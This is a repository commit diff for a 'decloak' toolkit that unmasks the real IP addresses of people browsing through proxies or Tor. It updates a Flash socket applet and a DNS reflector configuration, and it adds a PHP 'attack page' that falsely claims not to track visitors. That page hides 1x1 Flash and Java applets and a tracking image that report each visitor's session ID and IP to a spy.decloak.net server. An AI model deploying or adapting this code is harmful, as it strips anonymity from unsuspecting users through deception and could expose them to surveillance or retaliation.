Commits

Ethan Robish committed 475c771

updated decloak.hx for flash 9+
updated dnsreflect.pl
created test index.php attack page

Comments (0)

Files changed (8)

Decloak.flash8.hx

+class Decloak {
+    static function main() {
+		var myURL:String = flash.Lib._root._url;
+		var myPos:Int = myURL.lastIndexOf("/");
+		var myBase:String = myURL.substr(0,myPos+1);
+
+		var mySession:String  = flash.Lib._root.cid;
+		var myPort:Int        = flash.Lib._root.port;
+		var myClient:String   = flash.Lib._root.client;
+		var myCallback:String = flash.Lib._root.hook;
+
+		trace(myBase);
+		trace(myPort);
+
+		var socket:flash.XMLSocket = new flash.XMLSocket();
+		
+		socket.onConnect = function(success:Bool):Void {
+			if ( success ) {
+				trace("FLASH: CONNECTED");
+				socket.send(mySession + ':' + myClient + "\n");
+			}
+			else
+				trace("FLASH: FAILED");
+		}
+		socket.onData = function(src:String):Void {
+			if(myCallback.length > 0) {
+				flash.Lib.getURL('javascript:'+myCallback+'("'+src+'");');
+			}
+		}
+		
+		socket.onClose = function():Void {
+			trace("FLASH: CLOSED");
+		}
+		
+		trace("FLASH: CONNECTING...");
+		socket.connect( null, myPort );
+    }
+}
 class Decloak {
-    static function main() {
-		var myURL:String = flash.Lib._root._url;
-		var myPos:Int = myURL.lastIndexOf("/");
-		var myBase:String = myURL.substr(0,myPos+1);
+	static function main() {
+		var myURL:String = flash.Lib.current.loaderInfo.url;
+		//var regex:EReg = new EReg("^http://(.*?)/", "i");
+		//regex.match(myURL);
+		//var myBase:String = regex.matched(1); 
 
-		var mySession:String  = flash.Lib._root.cid;
-		var myPort:Int        = flash.Lib._root.port;
-		var myClient:String   = flash.Lib._root.client;
-		var myCallback:String = flash.Lib._root.hook;
+		var mySession:String	 = flash.Lib.current.loaderInfo.parameters.cid;
+		var myPort:Int		 = Std.parseInt(flash.Lib.current.loaderInfo.parameters.port);
+		var myClient:String	 = flash.Lib.current.loaderInfo.parameters.client;
+		var myCallback:String	 = flash.Lib.current.loaderInfo.parameters.hook;
 
-		var socket:flash.XMLSocket = new flash.XMLSocket();
-		
-		socket.onConnect = function(success:Bool):Void {
-			if ( success ) {
-				trace("FLASH: CONNECTED");
-				socket.send(mySession + ':' + myClient + "\n");
-			}
-			else
-				trace("FLASH: FAILED");
+		trace(myURL);
+		//trace(myBase);
+		//flash.Lib.trace(myBase);
+		trace(myPort);
+		//flash.Lib.trace(myPort);
+
+		var socket:flash.net.XMLSocket = new flash.net.XMLSocket();
+
+		var connectHandler = function( event:flash.events.Event ):Void {
+			trace("FLASH: CONNECTED");
+			//flash.Lib.trace("FLASH: CONNECTED");
+			event.target.send(mySession + ':' + myClient + "\n");
 		}
-		socket.onData = function(src:String):Void {
+
+		var dataHandler = function( event:flash.events.DataEvent ):Void {
 			if(myCallback.length > 0) {
-				flash.Lib.getURL('javascript:'+myCallback+'("'+src+'");');
+				new flash.net.URLRequest('javascript:'+myCallback+'("'+event.data+'");');
 			}
 		}
-		
-		socket.onClose = function():Void {
+
+		var closeHandler = function( event:flash.events.Event ):Void {
 			trace("FLASH: CLOSED");
+			//flash.Lib.trace("FLASH: CLOSED");
+		}
+
+		var securityHandler = function( event:flash.events.SecurityErrorEvent ):Void {
+			trace("FLASH: FAILED - SECURITY ERROR");
 		}
+
+		socket.addEventListener("connect", connectHandler);
+		socket.addEventListener("data", dataHandler);
+		socket.addEventListener("close", closeHandler);
+		socket.addEventListener("securityError", securityHandler);
+
+		//trace(flash.system.Security.sandboxType);
+		//flash.Lib.trace(flash.system.Security.sandboxType);
 		
 		trace("FLASH: CONNECTING...");
+		//flash.Lib.trace("FLASH: CONNECTING...");
+		//socket.connect( myBase, myPort );
+		// null needs to be changed to the dnsreflector server if it is different from the server hosting this flash
 		socket.connect( null, myPort );
-    }
+	}
 }
Binary file added.

HelloWorld.class

Binary file added.
+To get Decloak.swf use the command
+haxe -main Decloak -swf Decloak.swf -swf-version 10
+
+To get HelloWorld.class use the command
+javac HelloWorld.java
+
+Don't forget to set the DNS in /etc/resolv.conf to 127.0.0.1
+Don't forget to make spy.decloak.net resolve to 127.0.0.1
+echo 127.0.0.1 spy.decloak.net >> /etc/hosts
 my $bind = [ [$serv, 53], ['0.0.0.0', 5353] ];
 
 # You need :53530 TCP on the IP running the web site
-my $tcps = [ ['0.0.0.0', 53530] ];
+my $tcps = [ ['0.0.0.0', 53530], ['0.0.0.0', 843] ];
 
 # Wildcard subdomain we handle DNS for
 my $dom  = "spy.decloak.net";
 
 # Configure postgres credentials
-my $db_name = "dbname";
-my $db_user = "dbuser";
-my $db_pass = "<your_database_password>";
+my $db_name = "postgres";
+my $db_user = "dbusername";
+my $db_pass = "dbpassword";
 my $dbh;
 
 my $opts = {
+<html>
+<head>
+<title>Extremely safe anonymous webpage</title>
+</head>
+<body>
+
+<h3>Welcome! This page is not tracking you in any way.</h3>
+
+<?php
+// generate md5 sum set to $cid
+$cid = md5("secret" . $_SERVER['REMOTE_ADDR'] . $_SERVER['REMOTE_PORT'] . time() . "secret");
+// get ip set to $eip
+$eip = $_SERVER['REMOTE_ADDR'];
+?>
+<!-- // Flash doesn't like to be hidden // -->
+<object
+	classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"
+	codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab"
+	width=1
+	height=1
+>
+	<param name="movie" value="Decloak.swf?cid=<?php echo $cid;?>&port=53530&client=<?php echo $eip;?>&hook=" />
+	<embed src="Decloak.swf?cid=<?php echo $cid;?>&port=53530&client=<?php echo $eip;?>&hook="
+		play="true"
+		loop="false"
+		allowScriptAccess="always"
+		type="application/x-shockwave-flash"
+		pluginspage="http://www.macromedia.com/go/getflashplayer"
+		width=1
+		height=1		
+		>
+		
+	</embed>
+</object>
+
+<?php
+// instead of 0.0.0.0 it should be $iip signifying the client's internal IP address
+$http = "<img src='http://" . $cid . ".http." . $eip . ".0.0.0.0.spy.decloak.net/spin.gif' width=1 height=1/>";
+echo $http;
+?>
+
+<applet code="HelloWorld.class" mayscript width=1 height=1>
+	<param name='External' value='<?php echo $eip;?>'>
+	<param name='ClientID' value='<?php echo $cid;?>'>
+	<param name='UDPPort'  value='5353'>
+</applet>
+
+<body>
+</html>